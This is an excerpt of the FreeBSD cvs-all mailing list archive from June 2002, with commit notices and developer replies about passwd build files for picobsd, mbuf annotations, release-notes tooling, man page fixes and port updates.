pw_util.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG luigi 2002/06/20 14:17:34 PDT Modified files: release/picobsd/tinyware/passwd Makefile Added files: release/picobsd/tinyware/passwd extern.h local_passwd.c pw_copy.c pw_util.c pw_util.h Log: Add a few files which are needed to build "passwd" now that the standard version of these files have been PAMified (and axed). Revision Changes Path 1.2 +9 -36 src/release/picobsd/tinyware/passwd/Makefile 1.1 +38 -0 src/release/picobsd/tinyware/passwd/extern.h (new) 1.1 +237 -0 src/release/picobsd/tinyware/passwd/local_passwd.c (new) 1.1 +306 -0 src/release/picobsd/tinyware/passwd/pw_copy.c (new) 1.1 +258 -0 src/release/picobsd/tinyware/passwd/pw_util.c (new) 1.1 +44 -0 src/release/picobsd/tinyware/passwd/pw_util.h (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:20:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9A18A37B409; Thu, 20 Jun 2002 14:19:34 -0700 (PDT) Received: (from will@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KLJYJ76465; Thu, 20 Jun 2002 14:19:34 -0700 (PDT) (envelope-from will) Message-Id: <200206202119.g5KLJYJ76465@freefall.freebsd.org> From: Will Andrews Date: Thu, 20 Jun 2002 14:19:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-toolkits/qt23 Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG will 2002/06/20 14:19:34 PDT Modified files: x11-toolkits/qt23 Makefile Log: Block installation if Qt3 is already installed to prevent people from clobbering the installations. Submitted by: lioux Revision Changes Path 1.102 +8 -0 ports/x11-toolkits/qt23/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:21: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 86F4937B440; Thu, 20 Jun 2002 14:19:51 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KLJo476530; Thu, 20 Jun 2002 14:19:50 -0700 (PDT) (envelope-from bmah) Message-Id: <200206202119.g5KLJo476530@freefall.freebsd.org> From: "Bruce A. Mah" Date: Thu, 20 Jun 2002 14:19:49 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml relnotes.ent src/release/doc/share/mk doc.relnotes.mk src/release/doc/share/sgml release.dsl release.ent X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/20 14:19:49 PDT Modified files: release/doc/en_US.ISO8859-1/relnotes/common new.sgml relnotes.ent release/doc/share/mk doc.relnotes.mk release/doc/share/sgml release.dsl release.ent Log: Provide a way to keep out old ("historic") release notes from bloating the size of the rendered release notes. By default, any element with a role="historic" attribute won't get rendered in the output unless the INCLUDE_HISTORIC Makefile variable is defined. Revision Changes Path 1.369 +31 -10 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml 1.3 +4 -1 src/release/doc/en_US.ISO8859-1/relnotes/common/relnotes.ent 1.11 +18 -1 src/release/doc/share/mk/doc.relnotes.mk 1.6 +19 -1 src/release/doc/share/sgml/release.dsl 1.4 +5 -1 src/release/doc/share/sgml/release.ent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:22:44 2002 Delivered-To: cvs-all@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 931) id D44BE37B4B7; Thu, 20 Jun 2002 14:22:11 -0700 (PDT) Date: Thu, 20 Jun 2002 14:22:04 -0700 From: Juli Mallett To: Luigi Rizzo Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/release/picobsd/tinyware/passwd Makefile extern.h local_passwd.c pw_copy.c pw_util.c pw_util.h Message-ID: <20020620142201.A55848@FreeBSD.ORG> References: <200206202117.g5KLHYm76330@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206202117.g5KLHYm76330@freefall.freebsd.org>; from luigi@FreeBSD.org on Thu, Jun 20, 2002 at 02:17:34PM -0700 Organisation: The FreeBSD Project X-Alternate-Addresses: , , , X-Affiliated-Projects: FreeBSD, xMach, ircd-hybrid-7 X-Towel: Yes Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG * Luigi Rizzo escriuréres > luigi 2002/06/20 14:17:34 PDT > > Modified files: > release/picobsd/tinyware/passwd Makefile > Added files: > release/picobsd/tinyware/passwd extern.h local_passwd.c > pw_copy.c pw_util.c pw_util.h > Log: > Add a few files which are needed to build "passwd" now that > the standard version of these files have been PAMified (and axed). Maybe should have been a repo copy? Or am I misunderstanding where these come from? > Revision Changes Path > 1.2 +9 -36 src/release/picobsd/tinyware/passwd/Makefile > 1.1 +38 -0 src/release/picobsd/tinyware/passwd/extern.h (new) > 1.1 +237 -0 src/release/picobsd/tinyware/passwd/local_passwd.c (new) > 1.1 +306 -0 src/release/picobsd/tinyware/passwd/pw_copy.c (new) > 1.1 +258 -0 src/release/picobsd/tinyware/passwd/pw_util.c (new) > 1.1 +44 -0 src/release/picobsd/tinyware/passwd/pw_util.h (new) -- Juli Mallett | FreeBSD: The Power To Serve Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:27:25 2002 Delivered-To: cvs-all@freebsd.org Received: from overcee.wemm.org (12-232-114-102.client.attbi.com [12.232.114.102]) by hub.freebsd.org (Postfix) with ESMTP id CFA9837B401; Thu, 20 Jun 2002 14:27:17 -0700 (PDT) Received: from wemm.org (localhost [127.0.0.1]) by overcee.wemm.org (Postfix) with ESMTP id E583B380E; Thu, 20 Jun 2002 14:27:19 -0700 (PDT) (envelope-from peter@wemm.org) X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: Julian Elischer Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/alpha/alpha support.s src/sys/i386/i386 support.s src/sys/ia64/ia64 support.s src/sys/powerpc/powerpc copyinout.c src/sys/sys systm.h src/sys/sparc64/sparc64 support.s In-Reply-To: Date: Thu, 20 Jun 2002 14:27:19 -0700 From: Peter Wemm Message-Id: <20020620212719.E583B380E@overcee.wemm.org> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Julian Elischer wrote: > can you replace it with a suptr and fuptr (set user pointer and fettch > user pointer)? > > I'd really like to have them... Yep, I had your needs in mind, I just had not quite got that far yet. > On Thu, 20 Jun 2002, Peter Wemm wrote: > > > peter 2002/06/20 00:13:35 PDT > > > > Modified files: > > sys/alpha/alpha support.s > > sys/i386/i386 support.s > > sys/ia64/ia64 support.s > > sys/powerpc/powerpc copyinout.c > > sys/sys systm.h > > sys/sparc64/sparc64 support.s > > Log: > > Deorbit suibyte(). It was only used for split address space systems > > for supporting UIO_USERISPACE (ie: it wasn't used). > > > > Revision Changes Path > > 1.11 +0 -5 src/sys/alpha/alpha/support.s > > 1.90 +5 -6 src/sys/i386/i386/support.s > > 1.14 +0 -5 src/sys/ia64/ia64/support.s > > 1.6 +0 -7 src/sys/powerpc/powerpc/copyinout.c > > 1.14 +0 -12 src/sys/sparc64/sparc64/support.s > > 1.176 +0 -1 src/sys/sys/systm.h > > > > Cheers, -Peter -- Peter Wemm - peter@wemm.org; peter@FreeBSD.org; peter@yahoo-inc.com "All of this is for nothing if we don't go to the stars" - JMS/B5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:30:29 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C5B7337B41B; Thu, 20 Jun 2002 14:29:56 -0700 (PDT) Received: (from luigi@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KLTu577564; Thu, 20 Jun 2002 14:29:56 -0700 (PDT) (envelope-from luigi) Message-Id: <200206202129.g5KLTu577564@freefall.freebsd.org> From: Luigi Rizzo Date: Thu, 20 Jun 2002 14:29:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys mbuf.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG luigi 2002/06/20 14:29:56 PDT Modified files: sys/sys mbuf.h Log: Add some #define's for mbuf annotations. As the comment in the code says, eventually there will be a proper data structure (e.g NetBSD's struct m_tag) to store chains of annotations, and mbuf-handling procedures will handle these chains in the correct way. Right now, these chains do not exist, and we just use the constants defined here to implement simple ad-hoc solutions to remove some global variables used so far to pass around informations about packets being processed. Global variables are not only ugly and make the code unreadable, they also prevent from using parallelism in network stack processing. (the 3-days MFC only refers to this commit, i.e. the PACKET_TAG_* constants; the full mechanism will be committed and MFC'ed on a longer timescale). MFC after: 3 days Revision Changes Path 1.91 +48 -0 src/sys/sys/mbuf.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:33: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from iguana.icir.org (iguana.icir.org [192.150.187.36]) by hub.freebsd.org (Postfix) with ESMTP id 3677F37B40D; Thu, 20 Jun 2002 14:32:51 -0700 (PDT) Received: (from rizzo@localhost) by iguana.icir.org (8.11.6/8.11.3) id g5KLWpY73280; Thu, 20 Jun 2002 14:32:51 -0700 (PDT) (envelope-from rizzo) Date: Thu, 20 Jun 2002 14:32:50 -0700 From: Luigi Rizzo To: Juli Mallett Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/release/picobsd/tinyware/passwd Makefile extern.h local_passwd.c pw_copy.c pw_util.c pw_util.h Message-ID: <20020620143250.A73237@iguana.icir.org> References: <200206202117.g5KLHYm76330@freefall.freebsd.org> <20020620142201.A55848@FreeBSD.ORG> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020620142201.A55848@FreeBSD.ORG>; from jmallett@FreeBSD.org on Thu, Jun 20, 2002 at 02:22:04PM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Thu, Jun 20, 2002 at 02:22:04PM -0700, Juli Mallett wrote: > * Luigi Rizzo escriuréres > > luigi 2002/06/20 14:17:34 PDT > > > > Modified files: > > release/picobsd/tinyware/passwd Makefile > > Added files: > > release/picobsd/tinyware/passwd extern.h local_passwd.c > > pw_copy.c pw_util.c pw_util.h > > Log: > > Add a few files which are needed to build "passwd" now that > > the standard version of these files have been PAMified (and axed). > > Maybe should have been a repo copy? Or am I misunderstanding where these > come from? maybe. But the files are small, one or two have actually been modified, so i do not think it was worth the trouble of a repocopy (which i do not know how to do anyways). Actually, pw_util.h was committed by mistake now that I notice! cheers luigi > > Revision Changes Path > > 1.2 +9 -36 src/release/picobsd/tinyware/passwd/Makefile > > 1.1 +38 -0 src/release/picobsd/tinyware/passwd/extern.h (new) > > 1.1 +237 -0 src/release/picobsd/tinyware/passwd/local_passwd.c (new) > > 1.1 +306 -0 src/release/picobsd/tinyware/passwd/pw_copy.c (new) > > 1.1 +258 -0 src/release/picobsd/tinyware/passwd/pw_util.c (new) > > 1.1 +44 -0 src/release/picobsd/tinyware/passwd/pw_util.h (new) > > -- > Juli Mallett | FreeBSD: The Power To Serve > Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:35: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from iguana.icir.org (iguana.icir.org [192.150.187.36]) by hub.freebsd.org (Postfix) with ESMTP id B4F8A37B401; Thu, 20 Jun 2002 14:34:31 -0700 (PDT) Received: (from rizzo@localhost) by iguana.icir.org (8.11.6/8.11.3) id g5KLYVL73306; Thu, 20 Jun 2002 14:34:31 -0700 (PDT) (envelope-from rizzo) Date: Thu, 20 Jun 2002 14:34:31 -0700 From: Luigi Rizzo To: Juli Mallett Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/release/picobsd/tinyware/passwd Makefile extern.h local_passwd.c pw_copy.c pw_util.c pw_util.h Message-ID: <20020620143431.B73237@iguana.icir.org> References: <200206202117.g5KLHYm76330@freefall.freebsd.org> <20020620142201.A55848@FreeBSD.ORG> <20020620143250.A73237@iguana.icir.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020620143250.A73237@iguana.icir.org>; from luigi@FreeBSD.org on Thu, Jun 20, 2002 at 02:32:50PM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Thu, Jun 20, 2002 at 02:32:50PM -0700, Luigi Rizzo wrote: ... > Actually, pw_util.h was committed by mistake now that I notice! i take it back, it was committed correctly :) cheers luigi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:35:41 2002 Delivered-To: cvs-all@freebsd.org Received: from sccrmhc01.attbi.com (sccrmhc01.attbi.com [204.127.202.61]) by hub.freebsd.org (Postfix) with ESMTP id 971F437B43C; Thu, 20 Jun 2002 14:35:18 -0700 (PDT) Received: from bmah.dyndns.org ([12.233.149.189]) by sccrmhc01.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020620213517.QZIM1024.sccrmhc01.attbi.com@bmah.dyndns.org>; Thu, 20 Jun 2002 21:35:17 +0000 Received: from intruder.bmah.org (localhost [IPv6:::1]) by bmah.dyndns.org (8.12.3/8.12.3) with ESMTP id g5KLZHkR009393; Thu, 20 Jun 2002 14:35:17 -0700 (PDT) (envelope-from bmah@intruder.bmah.org) Received: (from bmah@localhost) by intruder.bmah.org (8.12.3/8.12.3/Submit) id g5KLZHTA009392; Thu, 20 Jun 2002 14:35:17 -0700 (PDT) (envelope-from bmah) Message-Id: <200206202135.g5KLZHTA009392@intruder.bmah.org> X-Mailer: exmh version 2.5+ 20020506 with nmh-1.0.4 To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Cc: "Bruce A. Mah" Subject: Re: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml relnotes.ent src/release/doc/share/mk doc.relnotes.mk src/release/doc/share/sgml release.dsl release.ent In-Reply-To: <200206202119.g5KLJo476530@freefall.freebsd.org> References: <200206202119.g5KLJo476530@freefall.freebsd.org> Comments: In-reply-to "Bruce A. Mah" message dated "Thu, 20 Jun 2002 14:19:49 -0700." From: "Bruce A. Mah" Reply-To: bmah@FreeBSD.org X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_-1922430465P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Thu, 20 Jun 2002 14:35:17 -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --==_Exmh_-1922430465P Content-Type: text/plain; charset=us-ascii If memory serves me right, "Bruce A. Mah" wrote: > bmah 2002/06/20 14:19:49 PDT > > Modified files: > release/doc/en_US.ISO8859-1/relnotes/common new.sgml > relnotes.ent > release/doc/share/mk doc.relnotes.mk > release/doc/share/sgml release.dsl release.ent > Log: > Provide a way to keep out old ("historic") release notes from bloating > the size of the rendered release notes. By default, any element with > a role="historic" attribute won't get rendered in the output unless > the INCLUDE_HISTORIC Makefile variable is defined. The idea here is that something that was MFC-ed a couple years ago (remember when we got rid of RSAREF?) will be taken for granted by most relnotes consumers and probably doesn't need to show up in the 5.0-RELEASE documentation. But if someone really wants to see the whole list, they have to option to do this. After this commit, the PDF file for the 5-CURRENT i386 release notes goes from 39 pages down to 17 pages, which is a length that somebody might actually be willing to read. In most cases, any relnotes item MFC-ed before 4.6-RELEASE is marked as "historic". I also forgot to mention that this idea came out of a discussion with some of the doc/ committers, most of whom are actively involved in translating the release documentation. Cheers, Bruce. --==_Exmh_-1922430465P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: Exmh version 2.5+ 20020506 iD8DBQE9EkqV2MoxcVugUsMRAm1FAKDO0VGWqeIKUsY1Z4TQNDP4/lDlsACcDxL0 2jZhmSJHKxiQjnIaVNuywxw= =GrLM -----END PGP SIGNATURE----- --==_Exmh_-1922430465P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:46:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 515E437B419; Thu, 20 Jun 2002 14:45:42 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KLjgU79371; Thu, 20 Jun 2002 14:45:42 -0700 (PDT) (envelope-from marcus) Message-Id: <200206202145.g5KLjgU79371@freefall.freebsd.org> From: Joe Marcus Clarke Date: Thu, 20 Jun 2002 14:45:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-wm/metacity-setup Makefile distinfo ports/x11-wm/metacity-setup/files patch-Makefile.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/20 14:45:42 PDT Modified files: x11-wm/metacity-setup Makefile distinfo x11-wm/metacity-setup/files patch-Makefile.in Log: Update to 0.5.2. Revision Changes Path 1.11 +3 -3 ports/x11-wm/metacity-setup/Makefile 1.7 +1 -1 ports/x11-wm/metacity-setup/distinfo 1.3 +7 -19 ports/x11-wm/metacity-setup/files/patch-Makefile.in To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:59:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5B9D737B404; Thu, 20 Jun 2002 14:59:22 -0700 (PDT) Received: (from naddy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KLxMj80528; Thu, 20 Jun 2002 14:59:22 -0700 (PDT) (envelope-from naddy) Message-Id: <200206202159.g5KLxMj80528@freefall.freebsd.org> From: Christian Weisgerber Date: Thu, 20 Jun 2002 14:59:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/math/calcoo pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG naddy 2002/06/20 14:59:22 PDT Modified files: math/calcoo pkg-descr Log: Correct typo. Submitted by: Alexei Kaminski Revision Changes Path 1.2 +1 -1 ports/math/calcoo/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 15:43:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4BC4E37B404; Thu, 20 Jun 2002 15:43:33 -0700 (PDT) Received: (from charnier@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KMhXl89214; Thu, 20 Jun 2002 15:43:33 -0700 (PDT) (envelope-from charnier) Message-Id: <200206202243.g5KMhXl89214@freefall.freebsd.org> From: Philippe Charnier Date: Thu, 20 Jun 2002 15:43:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/bin/pax pax.1 src/bin/ps ps.1 X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG charnier 2002/06/20 15:43:33 PDT Modified files: (Branch: RELENG_4) bin/pax pax.1 bin/ps ps.1 Log: The .Nm utility Revision Changes Path 1.12.2.8 +23 -21 src/bin/pax/pax.1 1.24.2.7 +6 -2 src/bin/ps/ps.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 15:50:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E396337B409; Thu, 20 Jun 2002 15:50:15 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KMoFg89938; Thu, 20 Jun 2002 15:50:15 -0700 (PDT) (envelope-from bmah) Message-Id: <200206202250.g5KMoFg89938@freefall.freebsd.org> From: "Bruce A. Mah" Date: Thu, 20 Jun 2002 15:50:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/20 15:50:15 PDT Modified files: release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: Modified release note: ncurses 5.2-20020615, added version number for lukemftp. Deleted release note: gawk. MFC noted: lukemftpd. Revision Changes Path 1.370 +6 -10 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 16: 2:31 2002 Delivered-To: cvs-all@freebsd.org Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by hub.freebsd.org (Postfix) with ESMTP id 118C737B40B; Thu, 20 Jun 2002 16:00:34 -0700 (PDT) Received: from InterJet.elischer.org ([12.232.206.8]) by rwcrmhc51.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020620230033.ZOBY11426.rwcrmhc51.attbi.com@InterJet.elischer.org>; Thu, 20 Jun 2002 23:00:33 +0000 Received: from localhost (localhost.elischer.org [127.0.0.1]) by InterJet.elischer.org (8.9.1a/8.9.1) with ESMTP id PAA32994; Thu, 20 Jun 2002 15:58:11 -0700 (PDT) Date: Thu, 20 Jun 2002 15:58:10 -0700 (PDT) From: Julian Elischer To: Luigi Rizzo Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/sys mbuf.h In-Reply-To: <200206202129.g5KLTu577564@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Re: MFC.. I presume that this method will not explode binary drivers.. (i.e. alll normal data appears in the normal places in outgoing packets) On Thu, 20 Jun 2002, Luigi Rizzo wrote: > luigi 2002/06/20 14:29:56 PDT > > Modified files: > sys/sys mbuf.h > Log: > Add some #define's for mbuf annotations. > > As the comment in the code says, eventually there will be a proper > data structure (e.g NetBSD's struct m_tag) to store chains of > annotations, and mbuf-handling procedures will handle these chains > in the correct way. > > Right now, these chains do not exist, and we just use the constants > defined here to implement simple ad-hoc solutions to remove some global > variables used so far to pass around informations about packets > being processed. > > Global variables are not only ugly and make the code unreadable, they > also prevent from using parallelism in network stack processing. > > (the 3-days MFC only refers to this commit, i.e. the PACKET_TAG_* > constants; the full mechanism will be committed and MFC'ed on a > longer timescale). > > MFC after: 3 days > > Revision Changes Path > 1.91 +48 -0 src/sys/sys/mbuf.h > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 16: 9:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E711C37B40B; Thu, 20 Jun 2002 16:09:11 -0700 (PDT) Received: (from charnier@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KN9BV95446; Thu, 20 Jun 2002 16:09:11 -0700 (PDT) (envelope-from charnier) Message-Id: <200206202309.g5KN9BV95446@freefall.freebsd.org> From: Philippe Charnier Date: Thu, 20 Jun 2002 16:09:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sbin/ffsinfo ffsinfo.8 src/sbin/md5 md5.1 src/sbin/savecore savecore.8 src/sbin/startslip startslip.1 X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG charnier 2002/06/20 16:09:11 PDT Modified files: (Branch: RELENG_4) sbin/ffsinfo ffsinfo.8 sbin/md5 md5.1 sbin/savecore savecore.8 sbin/startslip startslip.1 Log: The .Nm utility Revision Changes Path 1.6.2.3 +6 -5 src/sbin/ffsinfo/ffsinfo.8 1.10.2.7 +3 -2 src/sbin/md5/md5.1 1.8.2.6 +13 -5 src/sbin/savecore/savecore.8 1.16.2.5 +7 -6 src/sbin/startslip/startslip.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 16:10:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ACFA437B407; Thu, 20 Jun 2002 16:10:26 -0700 (PDT) Received: (from brian@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KNANB95823; Thu, 20 Jun 2002 16:10:23 -0700 (PDT) (envelope-from brian) Message-Id: <200206202310.g5KNANB95823@freefall.freebsd.org> From: Brian Somers Date: Thu, 20 Jun 2002 16:10:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/pppoa Makefile distinfo pkg-plist ports/net/pppoa/files patch-ab quick-install X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG brian 2002/06/20 16:10:23 PDT Modified files: net/pppoa Makefile distinfo pkg-plist net/pppoa/files patch-ab quick-install Log: Upgrade to 1.1b. Revision Changes Path 1.12 +8 -11 ports/net/pppoa/Makefile 1.4 +1 -1 ports/net/pppoa/distinfo 1.3 +11 -113 ports/net/pppoa/files/patch-ab 1.5 +2 -2 ports/net/pppoa/files/quick-install 1.5 +13 -9 ports/net/pppoa/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 